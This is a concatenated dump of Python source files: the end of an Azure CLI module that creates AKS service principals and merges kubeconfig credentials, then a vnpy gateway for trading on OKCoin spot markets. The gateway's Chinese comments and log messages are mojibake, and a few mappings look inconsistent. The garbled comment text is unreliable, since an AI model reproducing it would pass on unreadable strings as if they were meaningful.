"workspaceResourceId": { "value": workspace_resource_id }, "workspaceRegion": { "value": location }, "solutionDeploymentName": { "value": solution_deployment_name } } deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis) # publish the Container Insights solution to the Log Analytics workspace return _invoke_deployment(cmd.cli_ctx, resource_group, deployment_name, template, params, validate=False, no_wait=False, subscription_id=subscription_id) def _ensure_aks_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): file_name_aks = 'aksServicePrincipal.json' # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, try to load it from local disk principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks) if principal_obj: service_principal = principal_obj.get('service_principal') client_secret = principal_obj.get('client_secret') else: # Nothing to load, make one. if not client_secret: client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # We don't need to add role assignment for this created SPN else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks) return load_acs_service_principal(subscription_id, file_name=file_name_aks) def _ensure_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, try to load it from local disk principal_obj = load_acs_service_principal(subscription_id) if principal_obj: service_principal = principal_obj.get('service_principal') client_secret = principal_obj.get('client_secret') else: # Nothing to load, make one. if not client_secret: client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # add role first before save it if not _add_role_assignment(cli_ctx, 'Contributor', service_principal): logger.warning('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') store_acs_service_principal(subscription_id, client_secret, service_principal) return load_acs_service_principal(subscription_id) def _get_rg_location(ctx, resource_group_name, subscription_id=None): groups = cf_resource_groups(ctx, subscription_id=subscription_id) # Just do the get, we don't need the result, it will error out if the group doesn't exist. rg = groups.get(resource_group_name) return rg.location def _print_or_merge_credentials(path, kubeconfig, overwrite_existing): """Merge an unencrypted kubeconfig into the file at the specified path, or print it to stdout if the path is "-". """ # Special case for printing to stdout if path == "-": print(kubeconfig) return # ensure that at least an empty ~/.kube/config exists directory = os.path.dirname(path) if directory and not os.path.exists(directory): try: os.makedirs(directory) except OSError as ex: if ex.errno != errno.EEXIST: raise if not os.path.exists(path): with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'): pass # merge the new kubeconfig into the existing one fd, temp_path = tempfile.mkstemp() additional_file = os.fdopen(fd, 'w+t') try: additional_file.write(kubeconfig) additional_file.flush() merge_kubernetes_configurations(path, temp_path, overwrite_existing) except yaml.YAMLError as ex: logger.warning('Failed to merge credentials to kube config file: %s', ex) finally: additional_file.close() os.remove(temp_path) def _remove_nulls(managed_clusters): """ Remove some often-empty fields from a list of ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. """ attrs = ['tags'] ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id'] sp_attrs = ['secret'] for managed_cluster in managed_clusters: for attr in attrs: if getattr(managed_cluster, attr, None) is None: delattr(managed_cluster, attr) for ap_profile in managed_cluster.agent_pool_profiles: for attr in ap_attrs: if getattr(ap_profile, attr, None) is None: delattr(ap_profile, attr) for attr in sp_attrs: if getattr(managed_cluster.service_principal_profile, attr, None) is None: delattr(managed_cluster.service_principal_profile, attr) return managed_clusters def _validate_aci_location(norm_location): """ Validate the Azure Container Instance location """ aci_locations = [ "centralus", "eastus", "eastus2", "westus", "westus2", "northeurope", "westeurope", "southeastasia", "australiaeast" ] if norm_location not in aci_locations: raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) + ' The available locations are "{}"'.format(','.join(aci_locations)))
okcoinGateway.py
# encoding: UTF-8 ''' vn.okcoin็š„gatewayๆŽฅๅ…ฅ ๆณจๆ„๏ผš 1. ๅ‰ไป…ๆ”ฏๆŒUSDๅ’ŒCNY็š„็Žฐ่ดงไบคๆ˜“๏ผŒUSD็š„ๆœŸ่ดงๅˆ็บฆไบคๆ˜“ๆš‚ไธๆ”ฏๆŒ ''' import os import json from datetime import datetime from time import sleep from copy import copy from threading import Condition from Queue import Queue from threading import Thread from time import sleep from vnpy.api.okcoin import vnokcoin from vnpy.trader.vtGateway import * from vnpy.trader.vtFunction import getJsonPath # ไปทๆ ผ็ฑปๅž‹ๆ˜ ๅฐ„ priceTypeMap = {} priceTypeMap['buy'] = (DIRECTION_LONG, PRICETYPE_LIMITPRICE) priceTypeMap['buy_market'] = (DIRECTION_LONG, PRICETYPE_MARKETPRICE) priceTypeMap['sell'] = (DIRECTION_SHORT, PRICETYPE_LIMITPRICE) priceTypeMap['sell_market'] = (DIRECTION_SHORT, PRICETYPE_MARKETPRICE) priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()} # ๆ–นๅ‘็ฑปๅž‹ๆ˜ ๅฐ„ directionMap = {} directionMapReverse = {v: k for k, v in directionMap.items()} # ๅง”ๆ‰˜็Šถๆ€ๅฐๅฐ„ statusMap = {} statusMap[-1] = STATUS_CANCELLED statusMap[0] = STATUS_NOTTRADED statusMap[1] = STATUS_PARTTRADED statusMap[2] = STATUS_ALLTRADED statusMap[4] = STATUS_UNKNOWN ############################################ ## ไบคๆ˜“ๅˆ็บฆไปฃ็  ############################################ # USD BTC_USD_SPOT = 'BTC_USD_SPOT' BTC_USD_THISWEEK = 'BTC_USD_THISWEEK' BTC_USD_NEXTWEEK = 'BTC_USD_NEXTWEEK' BTC_USD_QUARTER = 'BTC_USD_QUARTER' LTC_USD_SPOT = 'LTC_USD_SPOT' LTC_USD_THISWEEK = 'LTC_USD_THISWEEK' LTC_USD_NEXTWEEK = 'LTC_USD_NEXTWEEK' LTC_USD_QUARTER = 'LTC_USD_QUARTER' ETH_USD_SPOT = 'ETH_USD_SPOT' ETH_USD_THISWEEK = 'ETH_USD_THISWEEK' ETH_USD_NEXTWEEK = 'ETH_USD_NEXTWEEK' ETH_USD_QUARTER = 'ETH_USD_QUARTER' # CNY BTC_CNY_SPOT = 'BTC_CNY_SPOT' LTC_CNY_SPOT = 'LTC_CNY_SPOT' ETH_CNY_SPOT = 'ETH_CNY_SPOT' # ๅฐๅฐ„ๅญ—ๅ…ธ spotSymbolMap = {} spotSymbolMap['ltc_usd'] = LTC_USD_SPOT spotSymbolMap['btc_usd'] = BTC_USD_SPOT spotSymbolMap['ETH_usd'] = ETH_USD_SPOT spotSymbolMap['ltc_cny'] = LTC_CNY_SPOT spotSymbolMap['btc_cny'] = BTC_CNY_SPOT spotSymbolMap['eth_cny'] = ETH_CNY_SPOT spotSymbolMapReverse = {v: k for k, v in spotSymbolMap.items()} ############################################ ## Channelๅ’ŒSymbol็š„ๅฐๅฐ„ ############################################ channelSymbolMap = {} # USD channelSymbolMap['ok_sub_spotusd_btc_ticker'] = BTC_USD_SPOT channelSymbolMap['ok_sub_spotusd_ltc_ticker'] = LTC_USD_SPOT channelSymbolMap['ok_sub_spotusd_eth_ticker'] = ETH_USD_SPOT channelSymbolMap['ok_sub_spotusd_btc_depth_20'] = BTC_USD_SPOT channelSymbolMap['ok_sub_spotusd_ltc_depth_20'] = LTC_USD_SPOT channelSymbolMap['ok_sub_spotusd_eth_depth_20'] = ETH_USD_SPOT # CNY channelSymbolMap['ok_sub_spotcny_btc_ticker'] = BTC_CNY_SPOT channelSymbolMap['ok_sub_spotcny_ltc_ticker'] = LTC_CNY_SPOT channelSymbolMap['ok_sub_spotcny_eth_ticker'] = ETH_CNY_SPOT channelSymbolMap['ok_sub_spotcny_btc_depth_20'] = BTC_CNY_SPOT channelSymbolMap['ok_sub_spotcny_ltc_depth_20'] = LTC_CNY_SPOT channelSymbolMap['ok_sub_spotcny_eth_depth_20'] = ETH_CNY_SPOT ######################################################################## class OkcoinGateway(VtGateway): """OkCoinๆŽฅๅฃ""" #---------------------------------------------------------------------- def __init__(self, eventEngine, gatewayName='OKCOIN'): """Constructor""" super(OkcoinGateway, self).__init__(eventEngine, gatewayName) self.api = Api(self) self.leverage = 0 self.connected = False self.fileName = self.gatewayName + '_connect.json' self.filePath = getJsonPath(self.fileName, __file__) #---------------------------------------------------------------------- def connect(self): """่ฟžๆŽฅ""" # ่ฝฝๅ…ฅjsonๆ–‡ไปถ try: f = file(self.filePath) except IOError: log = VtLogData() log.gatewayName = self.gatewayName log.logContent = u'่ฏปๅ–่ฟžๆŽฅ้…็ฝฎๅ‡บ้”™๏ผŒ่ฏทๆฃ€ๆŸฅ' self.onLog(log) return # ่งฃๆžjsonๆ–‡ไปถ setting = json.load(f) try: host = str(setting['host']) apiKey = str(setting['apiKey']) secretKey = str(setting['secretKey']) trace = setting['trace'] leverage = setting['leverage'] except KeyError: log = VtLogData() log.gatewayName = self.gatewayName log.logContent = u'่ฟžๆŽฅ้…็ฝฎ็ผบๅฐ‘ๅญ—ๆฎต๏ผŒ่ฏทๆฃ€ๆŸฅ' self.onLog(log) return # ๅˆๅง‹ๅŒ–ๆŽฅๅฃ self.leverage = leverage if host == 'CNY': host = vnokcoin.OKCOIN_CNY else: host = vnokcoin.OKCOIN_USD self.api.active = True self.api.connect(host, apiKey, secretKey, trace) log = VtLogData() log.gatewayName = self.gatewayName log.logContent = u'ๆŽฅๅฃๅˆๅง‹ๅŒ–ๆˆๅŠŸ' self.onLog(log) # ๅฏๅŠจๆŸฅ่ฏข self.initQuery() self.startQuery() #---------------------------------------------------------------------- def subscribe(self, subscribeReq): """่ฎข้˜…่กŒๆƒ…""" pass #---------------------------------------------------------------------- def sendOrder(self, orderReq): """ๅ‘ๅ•""" return self.api.spotSendOrder(orderReq) #---------------------------------------------------------------------- def cancelOrder(self, cancelOrderReq): """ๆ’คๅ•""" self.api.spotCancel(cancelOrderReq) #---------------------------------------------------------------------- def qryAccount(self): """ๆŸฅ่ฏข่ดฆๆˆท่ต„้‡‘""" self.api.spotUserInfo() #---------------------------------------------------------------------- def qryPosition(self): """ๆŸฅ่ฏขๆŒไป“""" pass #---------------------------------------------------------------------- def close(self): """ๅ…ณ้—ญ""" self.api.active = False self.api.close() #---------------------------------------------------------------------- def initQuery(self): """ๅˆๅง‹ๅŒ–่ฟž็ปญๆŸฅ่ฏข""" if self.qryEnabled: # ้œ€่ฆๅพช็Žฏ็š„ๆŸฅ่ฏขๅ‡ฝๆ•ฐๅˆ—่กจ self.qryFunctionList = [self.qryAccount] self.qryCount = 0 # ๆŸฅ่ฏข่งฆๅ‘ๅ€’่ฎกๆ—ถ self.qryTrigger = 2 # ๆŸฅ่ฏข่งฆๅ‘็‚น self.qryNextFunction = 0 # ไธŠๆฌก่ฟ่กŒ็š„ๆŸฅ่ฏขๅ‡ฝๆ•ฐ็ดขๅผ• self.startQuery() #---------------------------------------------------------------------- def query(self, event): """ๆณจๅ†Œๅˆฐไบ‹ไปถๅค„็†ๅผ•ๆ“ŽไธŠ็š„ๆŸฅ่ฏขๅ‡ฝๆ•ฐ""" self.qryCount += 1 if self.qryCount > self.qryTrigger: # ๆธ…็ฉบๅ€’่ฎกๆ—ถ self.qryCount = 0 # ๆ‰ง่กŒๆŸฅ่ฏขๅ‡ฝๆ•ฐ function = self.qryFunctionList[self.qryNextFunction] function() # ่ฎก็ฎ—ไธ‹ๆฌกๆŸฅ่ฏขๅ‡ฝๆ•ฐ็š„็ดขๅผ•๏ผŒๅฆ‚ๆžœ่ถ…่ฟ‡ไบ†ๅˆ—่กจ้•ฟๅบฆ๏ผŒๅˆ™้‡ๆ–ฐ่ฎพไธบ0 self.qryNextFunction += 1 if self.qryNextFunction == len(self.qryFunctionList): self.qryNextFunction = 0 #---------------------------------------------------------------------- def startQuery(self): """ๅฏๅŠจ่ฟž็ปญๆŸฅ่ฏข""" self.eventEngine.register(EVENT_TIMER, self.query) #---------------------------------------------------------------------- def setQryEnabled(self, qryEnabled): """่ฎพ็ฝฎๆ˜ฏๅฆ่ฆๅฏๅŠจๅพช็ŽฏๆŸฅ่ฏข""" self.qryEnabled = qryEnabled ######################################################################## class Api(vnokcoin.OkCoinApi): """OkCoin็š„APIๅฎž็Žฐ""" #---------------------------------------------------------------------- def __init__(self, gateway): """Constructor""" super(Api, self).__init__() self.gateway = gateway # gatewayๅฏน่ฑก self.gatewayName = gateway.gatewayName # gatewayๅฏน่ฑกๅ็งฐ self.active = False # ่‹ฅไธบTrueๅˆ™ไผšๅœจๆ–ญ็บฟๅŽ่‡ชๅŠจ้‡่ฟž self.cbDict = {} self.tickDict = {} self.orderDict = {} self.localNo = 0 # ๆœฌๅœฐๅง”ๆ‰˜ๅท self.localNoQueue = Queue() # ๆœชๆ”ถๅˆฐ็ณป็ปŸๅง”ๆ‰˜ๅท็š„ๆœฌๅœฐๅง”ๆ‰˜ๅท้˜Ÿๅˆ— self.localNoDict = {} # keyไธบๆœฌๅœฐๅง”ๆ‰˜ๅท๏ผŒvalueไธบ็ณป็ปŸๅง”ๆ‰˜ๅท self.orderIdDict = {} # keyไธบ็ณป็ปŸๅง”ๆ‰˜ๅท๏ผŒvalueไธบๆœฌๅœฐๅง”ๆ‰˜ๅท self.cancelDict = {} # keyไธบๆœฌๅœฐๅง”ๆ‰˜ๅท๏ผŒvalueไธบๆ’คๅ•่ฏทๆฑ‚ self.initCallback() #---------------------------------------------------------------------- def onMessage(self, ws, evt): """ไฟกๆฏๆŽจ้€""" data = self.readData(evt)[0] channel = data['channel'] callback = self.cbDict[channel] callback(data) #---------------------------------------------------------------------- def onError(self, ws, evt): """้”™่ฏฏๆŽจ้€""" error = VtErrorData() error.gatewayName = self.gatewayName error.errorMsg = str(evt) self.gateway.onError(error) #---------------------------------------------------------------------- def onClose(self, ws): """ๆŽฅๅฃๆ–ญๅผ€""" # ๅฆ‚ๆžœๅฐšๆœช่ฟžไธŠ๏ผŒๅˆ™ๅฟฝ็•ฅ่ฏฅๆฌกๆ–ญๅผ€ๆ็คบ if not self.gateway.connected: return self.gateway.connected = False self.writeLog(u'ๆœๅŠกๅ™จ่ฟžๆŽฅๆ–ญๅผ€') # ้‡ๆ–ฐ่ฟžๆŽฅ if self.active: def reconnect(): while not self.gateway.connected: self.writeLog(u'็ญ‰ๅพ…10็ง’ๅŽ้‡ๆ–ฐ่ฟžๆŽฅ') sleep(10) if not self.gateway.connected: self.reconnect() t = Thread(target=reconnect) t.start() #---------------------------------------------------------------------- def onOpen(self, ws): """่ฟžๆŽฅๆˆๅŠŸ""" self.gateway.connected = True self.writeLog(u'ๆœๅŠกๅ™จ่ฟžๆŽฅๆˆๅŠŸ') # ่ฟžๆŽฅๅŽๆŸฅ่ฏข่ดฆๆˆทๅ’Œๅง”ๆ‰˜ๆ•ฐๆฎ self.spotUserInfo() self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_LTC, '-1') self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_BTC, '-1') self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_ETH, '-1') # ่ฟžๆŽฅๅŽ่ฎข้˜…็Žฐ่ดง็š„ๆˆไบคๅ’Œ่ดฆๆˆทๆ•ฐๆฎ self.subscribeSpotTrades() self.subscribeSpotUserInfo() self.subscribeSpotTicker(vnokcoin.SYMBOL_BTC) self.subscribeSpotTicker(vnokcoin.SYMBOL_LTC) self.subscribeSpotTicker(vnokcoin.SYMBOL_ETH) self.subscribeSpotDepth(vnokcoin.SYMBOL_BTC, vnokcoin.DEPTH_20) self.subscribeSpotDepth(vnokcoin.SYMBOL_LTC, vnokcoin.DEPTH_20) self.subscribeSpotDepth(vnokcoin.SYMBOL_ETH, vnokcoin.DEPTH_20) # ๅฆ‚ๆžœ่ฟžๆŽฅ็š„ๆ˜ฏUSD็ฝ‘็ซ™ๅˆ™่ฎข้˜…ๆœŸ่ดง็›ธๅ…ณๅ›žๆŠฅๆ•ฐๆฎ if self.currency == vnokcoin.CURRENCY_USD: self.subscribeFutureTrades() self.subscribeFutureUserInfo() self.subscribeFuturePositions() # ่ฟ”ๅ›žๅˆ็บฆไฟกๆฏ if self.currency == vnokcoin.CURRENCY_CNY: l = self.generateCnyContract() else: l = self.generateUsdContract() for contract in l: contract.gatewayName = self.gatewayName self.gateway.onContract(contract) #---------------------------------------------------------------------- def writeLog(self, content): """ๅฟซ้€Ÿ่ฎฐๅฝ•ๆ—ฅๅฟ—""" log = VtLogData() log.gatewayName = self.gatewayName log.logContent = content self.gateway.onLog(log) #---------------------------------------------------------------------- def initCallback(self): """ๅˆๅง‹ๅŒ–ๅ›ž่ฐƒๅ‡ฝๆ•ฐ""" # USD_SPOT self.cbDict['ok_sub_spotusd_btc_ticker'] = self.onTicker self.cbDict['ok_sub_spotusd_ltc_ticker'] = self.onTicker self.cbDict['ok_sub_spotusd_eth_ticker'] = self.onTicker self.cbDict['ok_sub_spotusd_btc_depth_20'] = self.onDepth self.cbDict['ok_sub_spotusd_ltc_depth_20'] = self.onDepth self.cbDict['ok_sub_spotusd_eth_depth_20'] = self.onDepth self.cbDict['ok_spotusd_userinfo'] = self.onSpotUserInfo self.cbDict['ok_spotusd_orderinfo'] = self.onSpotOrderInfo self.cbDict['ok_sub_spotusd_userinfo'] = self.onSpotSubUserInfo self.cbDict['ok_sub_spotusd_trades'] = self.onSpotSubTrades self.cbDict['ok_spotusd_trade'] = self.onSpotTrade self.cbDict['ok_spotusd_cancel_order'] = self.onSpotCancelOrder # CNY_SPOT self.cbDict['ok_sub_spotcny_btc_ticker'] = self.onTicker self.cbDict['ok_sub_spotcny_ltc_ticker'] = self.onTicker self.cbDict['ok_sub_spotcny_eth_ticker'] = self.onTicker self.cbDict['ok_sub_spotcny_btc_depth_20'] = self.onDepth self.cbDict['ok_sub_spotcny_ltc_depth_20'] = self.onDepth self.cbDict['ok_sub_spotcny_eth_depth_20'] = self.onDepth self.cbDict['ok_spotcny_userinfo'] = self.onSpotUserInfo self.cbDict['ok_spotcny_orderinfo'] = self.onSpotOrderInfo self.cbDict['ok_sub_spotcny_userinfo'] = self.onSpotSubUserInfo self.cbDict['ok_sub_spotcny_trades'] = self.onSpotSubTrades self.cbDict['ok_spotcny_trade'] = self.onSpotTrade self.cbDict['ok_spotcny_cancel_order'] = self.onSpotCancelOrder # USD_FUTURES #---------------------------------------------------------------------- def onTicker(self, data): """""" if 'data' not in data: return channel = data['channel'] symbol = channelSymbolMap[channel] if symbol not in self.tickDict: tick = VtTickData() tick.symbol = symbol tick.vtSymbol = symbol tick.gatewayName = self.gatewayName self.tickDict[symbol] = tick else: tick = self.tickDict[symbol] rawData = data['data'] tick.highPrice = float(rawData['high']) tick.lowPrice = float(rawData['low']) tick.lastPrice = float(rawData['last']) tick.volume = float(rawData['vol'].replace(',', '')) #tick.date, tick.time = generateDateTime(rawData['timestamp']) newtick = copy(tick) self.gateway.onTick(newtick) #---------------------------------------------------------------------- def onDepth(self, data): """""" if 'data' not in data: return channel = data['channel'] symbol = channelSymbolMap[channel] if symbol not in self.tickDict: tick = VtTickData() tick.symbol = symbol tick.vtSymbol = symbol tick.gatewayName = self.gatewayName self.tickDict[symbol] = tick else: tick = self.tickDict[symbol] if 'data' not in data: return rawData = data['data'] tick.bidPrice1, tick.bidVolume1 = rawData['bids'][0] tick.bidPrice2, tick.bidVolume2 = rawData['bids'][1] tick.bidPrice3, tick.bidVolume3 = rawData['bids'][2] tick.bidPrice4, tick.bidVolume4 = rawData['bids'][3] tick.bidPrice5, tick.bidVolume5 = rawData['bids'][4] tick.askPrice1, tick.askVolume1 = rawData['asks'][-1] tick.askPrice2, tick.askVolume2 = rawData['asks'][-2] tick.askPrice3, tick.askVolume3 = rawData['asks'][-3] tick.askPrice4, tick.askVolume4 = rawData['asks'][-4] tick.askPrice5, tick.askVolume5 = rawData['asks'][-5] tick.date, tick.time = generateDateTime(rawData['timestamp']) newtick = copy(tick) self.gateway.onTick(newtick) #---------------------------------------------------------------------- def onSpotUserInfo(self, data): """็Žฐ่ดง่ดฆๆˆท่ต„้‡‘ๆŽจ้€""" rawData = data['data'] info = rawData['info'] funds = rawData['info']['funds'] # ๆŒไป“ไฟกๆฏ for symbol in ['btc', 'ltc','eth', self.currency]: if symbol in funds['free']: pos = VtPositionData() pos.gatewayName = self.gatewayName pos.symbol = symbol pos.vtSymbol = symbol pos.vtPositionName = symbol pos.direction = DIRECTION_NET pos.frozen = float(funds['freezed'][symbol]) pos.position = pos.frozen + float(funds['free'][symbol]) self.gateway.onPosition(pos) # ่ดฆๆˆท่ต„้‡‘ account = VtAccountData() account.gatewayName = self.gatewayName account.accountID = self.gatewayName account.vtAccountID = account.accountID account.balance = float(funds['asset']['net']) self.gateway.onAccount(account) #---------------------------------------------------------------------- def onSpotSubUserInfo(self, data): """็Žฐ่ดง่ดฆๆˆท่ต„้‡‘ๆŽจ้€""" if 'data' not in data: return rawData = data['data'] info = rawData['info'] # ๆŒไป“ไฟกๆฏ for symbol in ['btc', 'ltc','eth', self.currency]: if symbol in info['free']: pos = VtPositionData() pos.gatewayName = self.gatewayName pos.symbol = symbol pos.vtSymbol = symbol pos.vtPositionName = symbol pos.direction = DIRECTION_NET pos.frozen = float(info['freezed'][symbol]) pos.position = pos.frozen + float(info['free'][symbol]) self.gateway.onPosition(pos) #---------------------------------------------------------------------- def onSpotSubTrades(self, data): """ๆˆไบคๅ’Œๅง”ๆ‰˜ๆŽจ้€""" if 'data' not in data: return rawData = data['data'] # ๆœฌๅœฐๅ’Œ็ณป็ปŸๅง”ๆ‰˜ๅท orderId = str(rawData['orderId']) localNo = self.orderIdDict[orderId] # ๅง”ๆ‰˜ไฟกๆฏ if orderId not in self.orderDict: order = VtOrderData() order.gatewayName = self.gatewayName order.symbol = spotSymbolMap[rawData['symbol']] order.vtSymbol = order.symbol order.orderID = localNo order.vtOrderID = '.'.join([self.gatewayName, order.orderID]) order.price = float(rawData['tradeUnitPrice']) order.totalVolume = float(rawData['tradeAmount']) order.direction, priceType = priceTypeMap[rawData['tradeType']] self.orderDict[orderId] = order else: order = self.orderDict[orderId] order.tradedVolume = float(rawData['completedTradeAmount']) order.status = statusMap[rawData['status']] self.gateway.onOrder(copy(order)) # ๆˆไบคไฟกๆฏ if 'sigTradeAmount' in rawData and float(rawData['sigTradeAmount'])>0: trade = VtTradeData() trade.gatewayName = self.gatewayName trade.symbol = spotSymbolMap[rawData['symbol']] trade.vtSymbol = order.symbol trade.tradeID = str(rawData['id']) trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID]) trade.orderID = localNo trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID]) trade.price = float(rawData['sigTradePrice']) trade.volume = float(rawData['sigTradeAmount']) trade.direction, priceType = priceTypeMap[rawData['tradeType']] trade.tradeTime = datetime.now().strftime('%H:%M:%S') self.gateway.onTrade(trade) #---------------------------------------------------------------------- def onSpotOrderInfo(self, data): """ๅง”ๆ‰˜ไฟกๆฏๆŸฅ่ฏขๅ›ž่ฐƒ""" rawData = data['data'] for d in rawData['orders']: self.localNo += 1 localNo = str(self.localNo) orderId = str(d['order_id']) self.localNoDict[localNo] = orderId self.orderIdDict[orderId] = localNo if orderId not in self.orderDict: order = VtOrderData() order.gatewayName = self.gatewayName order.symbol = spotSymbolMap[d['symbol']] order.vtSymbol = order.symbol order.orderID = localNo order.vtOrderID = '.'.join([self.gatewayName, order.orderID]) order.price = d['price'] order.totalVolume = d['amount'] order.direction, priceType = priceTypeMap[d['type']] self.orderDict[orderId] = order else: order = self.orderDict[orderId] order.tradedVolume = d['deal_amount'] order.status = statusMap[d['status']] self.gateway.onOrder(copy(order)) #---------------------------------------------------------------------- def generateSpecificContract(self, contract, symbol): """็”Ÿๆˆๅˆ็บฆ""" new = copy(contract) new.symbol = symbol new.vtSymbol = symbol new.name = symbol return new #---------------------------------------------------------------------- def generateCnyContract(self): """็”ŸๆˆCNYๅˆ็บฆไฟกๆฏ""" contractList = [] contract = VtContractData() contract.exchange = EXCHANGE_OKCOIN contract.productClass = PRODUCT_SPOT contract.size = 1 contract.priceTick = 0.01 contractList.append(self.generateSpecificContract(contract, BTC_CNY_SPOT)) contractList.append(self.generateSpecificContract(contract, LTC_CNY_SPOT)) contractList.append(self.generateSpecificContract(contract, ETH_CNY_SPOT)) return contractList #---------------------------------------------------------------------- def generateUsdContract(self): """็”ŸๆˆUSDๅˆ็บฆไฟกๆฏ""" contractList = [] # ็Žฐ่ดง contract = VtContractData() contract.exchange = EXCHANGE_OKCOIN contract.productClass = PRODUCT_SPOT contract.size = 1 contract.priceTick = 0.01 contractList.append(self.generateSpecificContract(contract, BTC_USD_SPOT)) contractList.append(self.generateSpecificContract(contract, LTC_USD_SPOT)) contractList.append(self.generateSpecificContract(contract, ETH_USD_SPOT)) # ๆœŸ่ดง contract.productClass = PRODUCT_FUTURES contractList.append(self.generateSpecificContract(contract, BTC_USD_THISWEEK)) contractList.append(self.generateSpecificContract(contract, BTC_USD_NEXTWEEK)) contractList.append(self.generateSpecificContract(contract, BTC_USD_QUARTER)) contractList.append(self.generateSpecificContract(contract, LTC_USD_THISWEEK)) contractList.append(self.generateSpecificContract(contract, LTC_USD_NEXTWEEK)) contractList.append(self.generateSpecificContract(contract, LTC_USD_QUARTER)) contractList.append(self.generateSpecificContract(contract, ETH_USD_THISWEEK)) contractList.append(self.generateSpecificContract(contract, ETH_USD_NEXTWEEK)) contractList.append(self.generateSpecificContract(contract, ETH_USD_QUARTER)) return contractList #---------------------------------------------------------------------- def onSpotTrade(self, data): """ๅง”ๆ‰˜ๅ›žๆŠฅ""" rawData = data['data'] orderId = rawData['order_id'] # ๅฐฝ็ฎกwebsocketๆŽฅๅฃ็š„ๅง”ๆ‰˜ๅท่ฟ”ๅ›žๆ˜ฏๅผ‚ๆญฅ็š„๏ผŒไฝ†็ป่ฟ‡ๆต‹่ฏ•ๆ˜ฏ # ็ฌฆๅˆๅ…ˆๅ‘็Žฐๅ›ž็š„่ง„ๅพ‹๏ผŒๅ› ๆญค่ฟ™้‡Œ้€š่ฟ‡queue่Žทๅ–ไน‹ๅ‰ๅ‘้€็š„ # ๆœฌๅœฐๅง”ๆ‰˜ๅท๏ผŒๅนถๆŠŠๅฎƒๅ’ŒๆŽจ้€็š„็ณป็ปŸๅง”ๆ‰˜ๅท่ฟ›่กŒๆ˜ ๅฐ„ localNo = self.localNoQueue.get_nowait() self.localNoDict[localNo] = orderId self.orderIdDict[orderId] = localNo # ๆฃ€ๆŸฅๆ˜ฏๅฆๆœ‰็ณป็ปŸๅง”ๆ‰˜ๅท่ฟ”ๅ›žๅ‰ๅฐฑๅ‘ๅ‡บ็š„ๆ’คๅ•่ฏทๆฑ‚๏ผŒ่‹ฅๆœ‰ๅˆ™่ฟ› # ่กŒๆ’คๅ•ๆ“ไฝœ if localNo in self.cancelDict: req = self.cancelDict[localNo] self.spotCancel(req) del self.cancelDict[localNo] #---------------------------------------------------------------------- def onSpotCancelOrder(self, data): """ๆ’คๅ•ๅ›žๆŠฅ""" pass #---------------------------------------------------------------------- def spotSendOrder(self, req): """ๅ‘ๅ•""" symbol = spotSymbolMapReverse[req.symbol][:4] type_ = priceTypeMapReverse[(req.direction, req.priceType)] self.spotTrade(symbol, type_, str(req.price), str(req.volume)) # ๆœฌๅœฐๅง”ๆ‰˜ๅทๅŠ 1๏ผŒๅนถๅฐ†ๅฏนๅบ”ๅญ—็ฌฆไธฒไฟๅญ˜ๅˆฐ้˜Ÿๅˆ—ไธญ๏ผŒ่ฟ”ๅ›žๅŸบไบŽๆœฌๅœฐๅง”ๆ‰˜ๅท็š„vtOrderID self.localNo += 1 self.localNoQueue.put(str(self.localNo)) vtOrderID = '.'.join([self.gatewayName, str(self.localNo)]) return vtOrderID #---------------------------------------------------------------------- def spotCancel(self, req): """ๆ’คๅ•""" symbol = spotSymbolMapReverse[req.symbol][:4] localNo = req.orderID if localNo in self.localNoDict: orderID = self.localNoDict[localNo] self.spotCancelOrder(symbol, orderID) else: # ๅฆ‚ๆžœๅœจ็ณป็ปŸๅง”ๆ‰˜ๅท่ฟ”ๅ›žๅ‰ๅฎขๆˆทๅฐฑๅ‘้€ไบ†ๆ’คๅ•่ฏทๆฑ‚๏ผŒๅˆ™ไฟๅญ˜ # ๅœจcancelDictๅญ—ๅ…ธไธญ๏ผŒ็ญ‰ๅพ…่ฟ”ๅ›žๅŽๆ‰ง่กŒๆ’คๅ•ไปปๅŠก self.cancelDict[localNo] = req #---------------------------------------------------------------------- def generateDateTime(s): """็”Ÿๆˆๆ—ถ้—ด""" dt = datetime.fromtimestamp(float(s)/1e3) time = dt.strftime("%H:%M:%S.%f") date = dt.strftime("%Y%m%d") return date, time
sync.py
